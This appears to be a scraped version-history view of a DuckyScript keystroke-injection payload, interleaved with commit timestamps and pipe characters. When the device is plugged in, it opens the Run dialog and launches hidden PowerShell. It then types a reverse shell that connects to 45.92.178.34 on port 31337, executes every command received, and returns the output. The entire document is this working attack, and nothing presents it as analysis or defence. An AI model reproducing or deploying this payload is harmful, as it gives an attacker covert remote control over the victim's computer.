2024-08-22 10:27:33 +03:00
|
|
|
DELAY 1500
|
|
|
|
GUI r
|
|
|
|
DELAY 500
|
2024-08-22 10:34:13 +03:00
|
|
|
STRING powershell -NoP -NonI -W Hidden -Command
|
2024-08-22 10:27:33 +03:00
|
|
|
DELAY 250
|
|
|
|
ENTER
|
|
|
|
DELAY 200
|
2024-08-22 10:34:13 +03:00
|
|
|
|
|
|
|
STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
|
|
|
|
DELAY 100
|
|
|
|
STRING $stream = $client.GetStream();
|
|
|
|
DELAY 100
|
|
|
|
STRING [byte[]]$buffer = 0..65535|%{0};
|
|
|
|
DELAY 100
|
|
|
|
|
|
|
|
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
|
|
|
|
DELAY 100
|
|
|
|
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
|
|
|
|
DELAY 100
|
|
|
|
STRING $sendback = (iex $data 2>&1 | Out-String );
|
|
|
|
DELAY 100
|
|
|
|
STRING $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
|
|
|
|
DELAY 100
|
|
|
|
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
|
|
|
|
DELAY 100
|
|
|
|
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
|
|
|
|
DELAY 100
|
|
|
|
STRING $stream.Flush()
|
2024-08-22 10:27:33 +03:00
|
|
|
DELAY 100
|
2024-08-22 10:34:13 +03:00
|
|
|
STRING };
|
2024-08-22 10:27:33 +03:00
|
|
|
DELAY 100
|
2024-08-22 10:34:13 +03:00
|
|
|
STRING $client.Close()
|
2024-08-22 10:27:33 +03:00
|
|
|
DELAY 100
|
|
|
|
ENTER
|